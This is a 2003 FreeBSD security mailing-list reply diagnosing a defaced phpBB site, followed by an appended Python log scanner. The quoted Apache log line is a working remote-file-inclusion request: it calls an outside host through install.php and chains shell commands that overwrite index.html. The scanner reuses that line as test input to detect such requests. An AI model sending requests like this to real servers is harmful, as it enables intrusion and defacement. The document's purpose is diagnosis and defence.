Message-ID: <3FABF71A.7000903@daleco.biz>
Date: Fri, 07 Nov 2003 13:48:42 -0600
From: "Kevin D. Kinsey, DaleCo, S.P."
To: Miha Nedok
cc: freebsd-security@freebsd.org
Subject: Re: hack ? - urgent - false FreeBSD alarm
References: <20031107125529.R19165@voyager.zrcalo.si> <3FAB8B3A.7020908@remotelab.org> <20031107132650.H19165@voyager.zrcalo.si>
In-Reply-To: <20031107132650.H19165@voyager.zrcalo.si>

Miha Nedok wrote:

>Hi !
>
>It is phpBB related. I found in logs:
>200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET /forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site-name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
>
>I just did chmod 000 `find -name 'install.php'` for a workaround.
>
>Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 .
>
>-Miha
>

From ~/phpp/docs/Install.html:

_6. Important post-Install tasks for all installation methods_

Once you have successfully installed phpBB 2.0.0 you *MUST* ensure you
remove install.php, upgrade.php and update_to_FINAL.php files. Leaving
these in place is a _very serious potential security issue_.
Additionally you may delete the db/schemas, docs/ and contrib/
directories if you wish.
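
One way to spot requests like the one quoted in this thread in an Apache access log, as an added example that is not part of the original message: it flags hits on the three installer scripts named in the phpBB notes and any query parameter whose decoded value is a remote URL. The function names, the reason labels and the two 192.0.2.x log entries are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Files the phpBB 2.0.0 install notes quoted above say must be removed.
INSTALLER_SCRIPTS = {"install.php", "upgrade.php", "update_to_FINAL.php"}
# Apache combined log format, up to the status code.
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    script = url.path.rsplit("/", 1)[-1]
    # Percent-decode the query; only '&' separates parameters, so the
    # ';'-chained value of a parameter such as cmd stays in one piece.
    params = parse_qsl(url.query, keep_blank_values=True, separator="&")
    remote = [name for name, value in params if REMOTE_VALUE_RE.match(value)]
    reasons = []
    if script in INSTALLER_SCRIPTS:
        reasons.append("installer-script")
    if remote:
        reasons.append("remote-url-parameter")
    if not reasons:
        return None
    return {"host": m["host"], "script": script, "status": int(m["status"]),
            "reasons": reasons, "remote_params": remote, "decoded": dict(params)}

def scan(lines):
    return [finding for finding in map(inspect_line, lines) if finding]

SAMPLE_LOG = [
    # Entry quoted in the message above, rejoined onto one line.
    '200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET /forum/install.php'
    '?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;'
    'cd%20www.site-name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:'
    '%20ir4dex@hotmail.com%20>%20index.html HTTP/1.1" 200 904 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"',
    # Constructed entries: normal traffic, and a request refused after chmod 000.
    '192.0.2.10 - - [07/Nov/2003:11:30:12 +0100] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [07/Nov/2003:11:31:40 +0100] "GET /forum/install.php HTTP/1.1" 403 291 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["host"], f["status"], f["reasons"], f["decoded"])
```

A 200 status on an installer-script finding means the script was still reachable at the time of the request; a 403 is what the chmod 000 workaround produces.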